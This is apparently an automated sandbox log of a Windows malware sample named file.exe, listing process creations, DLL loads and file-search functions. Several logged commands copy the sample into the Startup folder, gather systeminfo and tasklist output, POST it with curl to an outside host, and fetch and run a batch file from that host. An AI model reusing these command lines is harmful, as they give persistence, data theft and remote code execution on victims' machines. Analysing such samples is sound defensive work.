Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Section loaded: wsock32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: framedynos.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: wsock32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: framedynos.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: secur32.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: schannel.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: secur32.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: schannel.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\SysWOW64\curl.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0024D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_0024D3A9 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0024DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_0024DBBE |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0021C2A2 FindFirstFileExW, | 0_2_0021C2A2 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002568EE FindFirstFileW,FindClose, | 0_2_002568EE |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0025698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, | 0_2_0025698F |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0024D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_0024D076 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00259642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00259642 |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0025979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_0025979D |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00259B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, | 0_2_00259B2B |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00255C97 FindFirstFileW,FindNextFileW,FindClose, | 0_2_00255C97 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 20_2_005AD3A9 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, | 20_2_005ADBBE |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_0057C2A2 FindFirstFileExW, | 20_2_0057C2A2 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B68EE FindFirstFileW,FindClose, | 20_2_005B68EE |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, | 20_2_005B698F |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 20_2_005AD076 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 20_2_005B9642 |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 20_2_005B979D |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, | 20_2_005B9B2B |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 20_2_005B5C97 FindFirstFileW,FindNextFileW,FindClose, | 20_2_005B5C97 |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | Jump to behavior |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | Jump to behavior |
